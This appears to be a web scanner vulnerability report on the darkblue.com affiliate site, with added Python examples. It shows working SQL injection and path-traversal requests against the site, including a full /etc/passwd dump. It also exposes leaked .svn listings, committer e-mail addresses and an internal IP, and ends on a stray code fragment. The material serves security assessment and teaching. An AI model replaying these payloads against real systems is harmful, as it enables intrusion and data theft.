groupTest.htmfile2010-01-12T00:34:16.000000Zd4a7228859860b22249049b6a893b9ac2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props legaldir skinsdir se-guru_net-header.giffile2010-01-12T00:34:16.000000Zad86d62a37de6bb7644997fb8a4b94ef2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props customercaread.htmfile2010-01-12T00:34:16.000000Z78280e2e1e6ccb76a6c0aa83b4a6de712009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advtermsandconditions.htmfile2010-01-12T00:34:16.000000Z0d3f59199b2eabc018637e3f6ff6006c2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props updateLinkStatus.phpfile2010-01-12T00:34:16.000000Z8bfe6d339088bb123855c10edff59b482009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props cobrandsdir ttfdir getcode.phpfile2010-01-12T00:34:16.000000Zddf4c83a15bfa88617388c0d870818102009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com 
adWarn.htmfile2010-01-12T00:34:16.000000Z89b5383329a05f911953a647e448ced62009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props iasbetdir describe.htmfile2010-01-12T00:34:16.000000Zdf962b7b0aafa5a65aaad4d3e10b781d2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props unsubscribe.htmfile2010-01-12T00:34:16.000000Zf45249b5edf2a50809a57d3628bb4a762009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props edit.htmfile2010-01-12T00:34:16.000000Z4282079864bbea49b05fb701a8a4a3942009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props payoutDetails.htmfile2010-01-12T00:34:16.000000Zd84ee7857e80a481dd3b4d0966494ac72009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props mlgraph.phpfile2010-01-12T00:34:16.000000Ze7d8faf445fa518472a3cc6d40fb7b392009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props banlist.htmfile2010-01-12T00:34:16.000000Zcf4c3e5e6e55f9c50f0474b69b477ceb2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props aff.htmfile2010-01-12T00:34:16.000000Za644145ad5334a7aa8b0f7334a7dfff02009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props sizes.phpfile2010-01-12T00:34:16.000000Z6f1ad9b7f5c071c642ec8da0a08e17662009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props gaTerms.phpfile2010-01-12T00:34:16.000000Z568d9f9dada5fc43d1c9350ecc88607a2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props casino_signup.htmfile2010-01-12T00:34:16.000000Zfd0a3277ef449bb82f98b693746031582009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props payoutHistory.phpfile2010-01-12T00:34:16.000000Z05dc9183902e75d3dc118cacd674ac982009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props NoABNStatement.pdffile2010-01-12T00:34:16.000000Zab4a310d93bd1f443c4c99bb0968f6ec2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advertisersdir 
affiliates.phpfile2010-01-12T00:34:16.000000Z0fd719981a44c097e61e52984826f17f2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props templatesdir banAdmin.htmfile2010-01-12T00:34:16.000000Zc0a8f310a75a9a1eacd0e2f563f9e77a2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props termsandconditions_adlt.htmfile2010-01-12T00:34:16.000000Z486e753a5f3c5c3f58de9cff7cab50312009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props codeGeneratorsdir bees.htmfile2010-01-12T00:34:16.000000Z77d42212a66091ef3f7535570947af582009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props mainadv.htmfile2010-01-12T00:34:16.000000Z770ac41f7d3ca0986b57b4a288bb9ee42009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props signup_step01_bt_LANDINGPAGE.htmfile2010-01-12T00:34:16.000000Zf274ce601cdc93e02b77f962d7bce7002009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props statsGraph.phpfile2010-01-12T00:34:16.000000Z077c9da490c331ec3791061d365892fa2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props stat_supportdir controller_old.phpfile2010-01-12T00:34:16.000000Z3b2b18b2372aba524d33ee64f96ac2b52009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props whoweare.htmfile2010-01-12T00:34:16.000000Zb6deaa55438afd9bb171338468ccdf022009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props statdir
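To show what the leaked file actually contains, here is a parser for the line-oriented Subversion entries format (the leading 8 is the working-copy format number; formats 8 to 10 are written by Subversion 1.4 to 1.6 clients), as an added Python example that is not part of the report or of Subversion. The sample is reconstructed in the on-disk layout from four of the records shown above: the record for the directory itself (empty name) carries the repository URL, root and UUID, and each following record is one versioned file or subdirectory. The field order in the comment is the one used by the libsvn_wc writer for those formats; pristine_paths only lists where such a working copy stores its unmodified copies and makes no claim that the target serves them, and private_ipv4s is the check this finding is based on.

```python
"""Parse a Subversion 1.4-1.6 .svn/entries file and list what it gives away.
Added example; not Netsparker code and not part of Subversion."""
import ipaddress
import re

# Field order written by libsvn_wc for entries-file formats 8 to 10.  One field per
# line, a form feed ends each record, and trailing empty fields are omitted, so most
# records are shorter than this list.  Fields after "uuid" (lock, changelist, depth)
# are not needed here and are dropped.
FIELDS = (
    "name", "kind", "revision", "url", "repos", "schedule", "text_time", "checksum",
    "committed_date", "committed_rev", "last_author", "has_props", "has_prop_mods",
    "cachable_props", "present_props", "conflict_old", "conflict_new", "conflict_wrk",
    "prop_reject_file", "copied", "copyfrom_url", "copyfrom_rev", "deleted", "absent",
    "incomplete", "uuid",
)
RECORD_END = "\x0c\n"


def _record(*fields):
    """Serialise one record in the on-disk layout (used only to build the sample)."""
    return "".join(f + "\n" for f in fields) + RECORD_END


# Constructed sample: four records taken from the file shown in this finding.
SAMPLE_ENTRIES = "8\n" + "".join([
    _record("", "dir", "39656",                          # the directory itself
            "http://172.17.1.192/dbs/darkblue/branches/live/www",
            "http://172.17.1.192/dbs",
            "", "", "",                                  # schedule, text-time, checksum
            "2010-08-30T04:15:20.608602Z", "39652", "b.dutton@au.darkbluesea.com",
            "", "",                                      # has-props, has-prop-mods
            "svn:special svn:externals svn:needs-lock",
            *([""] * 11),                                # present-props .. incomplete
            "aa7cf516-5f06-0410-ac50-8bdd415cf406"),
    _record("penguins.htm", "file", "", "", "", "",
            "2010-01-12T00:34:16.000000Z", "4a918f0d499a9e5c56ade8d94eec2e88",
            "2009-11-01T23:42:49.704911Z", "38013", "a.clark@au.darkbluesea.com",
            "has-props"),
    _record("kirsty", "dir"),                            # subdirectory, own entries file
    _record("remittance.php", "file", "", "", "", "",
            "2010-01-12T00:34:16.000000Z", "a3e582bf6574922665b7b1aaa9a2eb61",
            "2009-11-01T23:42:49.704911Z", "38013", "a.clark@au.darkbluesea.com",
            "has-props"),
])


def parse_entries(text):
    """Return (format_number, [record dict, ...]); record 0 is the directory itself."""
    fmt_line, _, body = text.partition("\n")
    fmt = int(fmt_line)
    if not 8 <= fmt <= 10:
        raise ValueError("not a line-oriented entries file (format %d)" % fmt)
    records = []
    for raw in body.split(RECORD_END):
        if raw == "":                       # text after the final terminator
            continue
        fields = raw.split("\n")
        if fields[-1] == "":                # newline that ended the last field
            fields.pop()
        fields += [""] * (len(FIELDS) - len(fields))
        records.append(dict(zip(FIELDS, fields)))
    return fmt, records


def summarize(text):
    """The attacker-relevant facts: where the code came from, who commits, what exists."""
    fmt, recs = parse_entries(text)
    here = recs[0]
    return {
        "format": fmt,
        "repo_url": here["url"],
        "repo_root": here["repos"],
        "uuid": here["uuid"],
        "authors": sorted({r["last_author"] for r in recs if r["last_author"]}),
        "files": [r["name"] for r in recs[1:] if r["kind"] == "file"],
        "dirs": [r["name"] for r in recs[1:] if r["kind"] == "dir"],
    }


def pristine_paths(recs):
    """Where a format 8-10 working copy keeps the unmodified copy of each file.
    Whether the web server serves these paths must be verified on the target."""
    return [".svn/text-base/%s.svn-base" % r["name"] for r in recs[1:] if r["kind"] == "file"]


IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def private_ipv4s(text):
    """Private-range (RFC 1918, loopback, link-local) IPv4 addresses found in text."""
    found = set()
    for candidate in IPV4_RE.findall(text):
        try:
            if ipaddress.ip_address(candidate).is_private:
                found.add(candidate)
        except ValueError:                  # an octet above 255
            continue
    return sorted(found)
```

On the full file from the report the same functions would return roughly two hundred file and directory names, three committer identities (the two addresses above plus svnsyncer), and the single internal address Netsparker flagged.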
MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes. The identification comes from a probe submitted in the forgot-password e-mail parameter: it is written in MySQL-specific syntax (IF(), IFNULL(), CHAR(), CONCAT()) that would not evaluate on another database engine, so a differential response to it fingerprints MySQL. Note also that the response below echoes the submitted value back into the page unencoded, which is worth checking against the cross-site scripting findings in this report.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
/index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=forgotpassword

Request

POST /index.htm?info=1&section=forgotpassword HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 208
Accept-Encoding: gzip, deflate

email=-1%27OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--%20&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:15:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 1222
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body><div id="password-retrieval"><h2>Password Retrieval</h2><br /> <p>Could not find account with email as -1'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))-- <p><a href="#" onClick="history.go(-1)">Try Again?</a><br></p> <br /> <p>You may now close this window.</p></div></body></html>
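Decoded, the email= value above builds the string NETSPARKER out of CHAR() calls, takes its fifth character (P, ASCII 80) and compares it with 88; that comparison is false, so IF() yields 2, 1=2 fails, and the injected condition as a whole is false, which matches the "Could not find account" response. The true half of the pair would compare with 80. The added example below (Python, not from the report) evaluates that probe offline and then reproduces the underlying mistake, string concatenation beside a parameterised query, against a constructed SQLite table. SQLite has no IF() or CHAR(), which is exactly why a MySQL-only probe fingerprints the database, so the two halves of the boolean test are written there with plain 1=1 and 1=2.

```python
"""Boolean-based blind SQL injection: what the probe tests and why it can run at all.
Added example; the table and rows are constructed, not taken from the target."""
import re
import sqlite3

# The email= value from the request above with %27 and %20 decoded.
REPORT_PROBE = (
    "-1'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT("
    "CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),"
    "CHAR(69),CHAR(82))),5,1)),0)=88),1,2))-- "
)


def decode_char_sequence(sql):
    """Rebuild the literal that CONCAT(CHAR(n),CHAR(n),...) produces (avoids quotes)."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", sql))


def probe_condition_holds(sql):
    """Evaluate offline the comparison inside IF(): does character <pos> of the
    CHAR()-built marker have ASCII code <value>?  True marks the 'true' half of a
    boolean pair, False the 'false' half."""
    marker = decode_char_sequence(sql)
    pos = int(re.search(r"\),(\d+),1\)", sql).group(1))
    value = int(re.search(r"=(\d+)\),1,2\)", sql).group(1))
    return ord(marker[pos - 1]) == value


def accounts_db():
    """In-memory stand-in for the site's account table (constructed rows)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, email TEXT NOT NULL)")
    con.executemany("INSERT INTO accounts (email) VALUES (?)",
                    [("alice@example.com",), ("bob@example.com",)])
    return con


def find_account_vulnerable(con, email):
    """The pattern behind the finding: the form value is pasted into the SQL text,
    so a quote ends the literal and the rest of the value becomes SQL."""
    sql = "SELECT COUNT(*) FROM accounts WHERE email = '%s'" % email
    return con.execute(sql).fetchone()[0]


def find_account_fixed(con, email):
    """Parameterised query: the value is bound as data and cannot alter the statement."""
    return con.execute("SELECT COUNT(*) FROM accounts WHERE email = ?",
                       (email,)).fetchone()[0]


# The report's shape ('OR 1=1 AND <condition>--') with engine-neutral conditions.
TRUE_PROBE = "-1' OR 1=1 AND 1=1-- "
FALSE_PROBE = "-1' OR 1=1 AND 1=2-- "

if __name__ == "__main__":
    print(decode_char_sequence(REPORT_PROBE), probe_condition_holds(REPORT_PROBE))
    con = accounts_db()
    for probe in (TRUE_PROBE, FALSE_PROBE):
        print(repr(probe), find_account_vulnerable(con, probe), find_account_fixed(con, probe))
```

With the vulnerable lookup the true probe matches every row and the false probe none, which is the observable difference a blind scanner keys on; with the bound parameter both return zero rows, because the whole value is compared as an e-mail address.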
Directory Listing (Apache)

1 TOTAL
INFORMATION
The web server responded with a list of files located in the target directory.

Impact

An attacker can see the files located in the directory and could potentially access files which disclose sensitive information.

Actions to Take

  1. See the remedy for solution.
  2. Configure the web server to disallow directory listing requests.
  3. This can also be caused by web server products that do not have the latest security patches. Ensure that all patches have been applied.

Remedy

Change your httpd.conf file. A secure configuration for the requested directory should be similar to the following one:
<Directory /{YOUR DIRECTORY}>
	Options FollowSymLinks 
</Directory>
Remove the Indexes option from the configuration, and remove MultiViews as well. Note that an Options line without + or - prefixes replaces the whole inherited set, so the block above turns off Indexes and MultiViews for that directory even if a parent directory or the server default enables them. If you use the relative form instead, write -Indexes -MultiViews explicitly: Options +FollowSymLinks on its own leaves an inherited Indexes in place.

/skins/lander/

http://darkblue.com/skins/lander/

Request

GET /skins/lander/ HTTP/1.1
Referer: http://darkblue.com/skins/lander/reset.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:11 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 1427
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html> <head> <title>Index of /skins/lander</title> </head> <body><h1>Index of /skins/lander</h1><table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr><tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/skins/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="images/">images/</a></td><td align="right">31-Jan-2010 17:57 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="js/">js/</a></td><td align="right">31-Jan-2010 17:57 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="reset.css">reset.css</a></td><td align="right">31-Jan-2010 17:57 </td><td align="right">710 </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="style.css">style.css</a></td><td align="right">03-Feb-2010 16:08 </td><td align="right">5.6K</td></tr><tr><th colspan="5"><hr></th></tr></table><address>Apache/2.2.3 (CentOS) Server at darkblue.com Port 80</address></body></html>
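Two added examples in one Python block, neither from the report nor from Apache: a parser that recognises an Apache autoindex page and lists what it exposes (run here over the listing above, with the markup trimmed to one string), and a small model of how Apache merges an Options line with the set inherited from the parent directory, which is the point the remedy's wording depends on. The Options rules it encodes are the documented ones for Apache 2.2: tokens that all carry + or - adjust the inherited set, unsigned tokens replace it, mixing the two forms is a configuration error, and All means every option except MultiViews.

```python
"""Spot an Apache directory index and model Options merging.  Added example."""
import re

# Constructed from the index page in the response above, trimmed to one string.
SAMPLE_INDEX = (
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html><head>'
    '<title>Index of /skins/lander</title></head><body><h1>Index of /skins/lander</h1>'
    '<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th>'
    '<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th>'
    '<th><a href="?C=S;O=A">Size</a></th></tr>'
    '<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td>'
    '<td><a href="/skins/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td></tr>'
    '<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td>'
    '<td><a href="images/">images/</a></td><td align="right">31-Jan-2010 17:57 </td><td align="right"> - </td></tr>'
    '<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td>'
    '<td><a href="js/">js/</a></td><td align="right">31-Jan-2010 17:57 </td><td align="right"> - </td></tr>'
    '<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td>'
    '<td><a href="reset.css">reset.css</a></td><td align="right">31-Jan-2010 17:57 </td><td align="right">710 </td></tr>'
    '<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td>'
    '<td><a href="style.css">style.css</a></td><td align="right">03-Feb-2010 16:08 </td><td align="right">5.6K</td></tr>'
    '</table><address>Apache/2.2.3 (CentOS) Server at darkblue.com Port 80</address></body></html>'
)

# One mod_autoindex table row: link cell, last-modified cell, size cell.
ROW_RE = re.compile(
    r'<td[^>]*><a href="([^"]+)">[^<]*</a></td>\s*<td[^>]*>([^<]*)</td>\s*<td[^>]*>([^<]*)</td>',
    re.I)


def parse_autoindex(html):
    """Return the listed entries as dicts, or None if the page is not an Apache index."""
    if not re.search(r"<title>\s*Index of /", html, re.I):
        return None
    entries = []
    for href, modified, size in ROW_RE.findall(html):
        if href.startswith(("/", "?")):     # Parent Directory and column-sort links
            continue
        entries.append({"name": href,
                        "kind": "dir" if href.endswith("/") else "file",
                        "modified": modified.strip(),
                        "size": size.strip()})
    return entries


# Option names Apache 2.2 accepts (matched case-insensitively, as httpd does).
ALL_OPTIONS = {"ExecCGI", "FollowSymLinks", "Includes", "IncludesNOEXEC",
               "Indexes", "MultiViews", "SymLinksIfOwnerMatch"}
_CANON = {o.lower(): o for o in ALL_OPTIONS}


def _expand(name):
    """Map one option token to the set of options it denotes."""
    key = name.lower()
    if key == "all":
        return ALL_OPTIONS - {"MultiViews"}
    if key == "none":
        return set()
    if key not in _CANON:
        raise ValueError("unknown option %r" % name)
    return {_CANON[key]}


def effective_options(inherited, directive):
    """Apply one 'Options ...' line to the set inherited from the parent directory."""
    tokens = directive.split()
    if len(tokens) < 2 or tokens[0].lower() != "options":
        raise ValueError("expected an Options directive")
    tokens = tokens[1:]
    signed = [t[0] in "+-" for t in tokens]
    if all(signed):                         # relative form: adjust what was inherited
        result = set(inherited)
        for t in tokens:
            if t[0] == "+":
                result |= _expand(t[1:])
            else:
                result -= _expand(t[1:])
        return result
    if any(signed):                         # httpd refuses to start on a mixed line
        raise ValueError("Apache rejects mixing +/- options with unsigned ones")
    result = set()                          # absolute form: replace what was inherited
    for t in tokens:
        result |= _expand(t)
    return result
```

A scanner (or a quick manual sweep) only needs the title check to flag a listing; the row parser is what turns one exposed directory into a list of further paths to request. The Options model is the check to run in your head before signing off on a remedy: against a parent that grants Indexes MultiViews FollowSymLinks, the report's absolute Options FollowSymLinks is safe, while a relative Options +FollowSymLinks changes nothing.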
E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site. The address listed below is a generic one; the personal committer addresses exposed in the /.svn/entries file (see the Internal IP Address Leakage finding above) are not counted here, yet they are exactly the user-specific addresses the remedy warns about.

Impact

E-mail addresses discovered within the application can be used by spam engines and by brute-force tools as a list of likely user names. Furthermore, valid e-mail addresses may lead to social engineering attacks.

Remedy

Use generic e-mail addresses such as contact@ or info@ for general communications, remove user-specific e-mail addresses from the web site and, where direct contact is required, use submission forms instead.

External References

- /index.htm

/index.htm

http://darkblue.com/index.htm?info=1&section=privacypolicy

Found E-mails

privacy@darkbluesea.com

Request

GET /index.htm?info=1&section=privacypolicy HTTP/1.1
Referer: http://darkblue.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 18207


[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

3 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact; however, this information can help an attacker during the exploitation of other vulnerabilities.

Remediation

External References

- /index.htm

/index.htm

http://darkblue.com/index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00

Identified Internal Path(s)

  • /bin/bash
  • /sbin/nologin
  • /var/adm:/sbin/nologin
  • /var/spool/lpd:/sbin/nologin
  • /bin/sync
  • /sbin/shutdown
  • /sbin/halt
  • /var/spool/mail:/sbin/nologin
  • /etc/news:
  • /var/spool/uucp:/sbin/nologin
  • /usr/games:/sbin/nologin
  • /var/gopher:/sbin/nologin
  • /var/ftp:/sbin/nologin
  • /var/lib/rpm:/sbin/nologin
  • /var/crash:/bin/bash
  • /var/empty/sshd:/sbin/nologin
  • /var/spool/mqueue:/sbin/nologin
  • /var/lib/nfs:/sbin/nologin
  • /var/arpwatch:/sbin/nologin
  • /etc/X11/fs:/sbin/nologin

Request

GET /index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00 HTTP/1.1
Referer: http://darkblue.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 2597
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body>root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS 
User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinpegasus:x:100:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashdbs:x:500:100::/home/dbs:/bin/bashmonit:x:101:101:monit daemon:/var/lib/monit:/bin/shdistcache:x:94:94:Distcache:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrbackup:x:501:501::/home/rbackup:/bin/sh</body></html>
- /.svn/text-base/xbTreeWidgetStatic.js.svn-base

/.svn/text-base/xbTreeWidgetStatic.js.svn-base

http://darkblue.com/.svn/text-base/xbTreeWidgetStatic.js.svn-base

Identified Internal Path(s)

/lib/js/license/mpl-tri-license.txt

Request

GET /.svn/text-base/xbTreeWidgetStatic.js.svn-base HTTP/1.1
Referer: http://darkblue.com/.svn/text-base/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:24:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 12 Jan 2010 00:33:38 GMT
ETag: "688a28-159b-ce0e1c80"
Accept-Ranges: bytes
Content-Length: 5531
Content-Type: application/x-javascript


- /.svn/text-base/xbDebug.js.svn-base

/.svn/text-base/xbDebug.js.svn-base

http://darkblue.com/.svn/text-base/xbDebug.js.svn-base

Identified Internal Path(s)

/lib/js/license/mpl-tri-license.txt

Request

GET /.svn/text-base/xbDebug.js.svn-base HTTP/1.1
Referer: http://darkblue.com/.svn/text-base/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:24:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 12 Jan 2010 00:33:41 GMT
ETag: "689015-1f8e-ce3be340"
Accept-Ranges: bytes
Content-Length: 8078
Content-Type: application/x-javascript


Total time=' + execprofile.time + 'ms. Avg Time=' + avg + 'ms.'); }}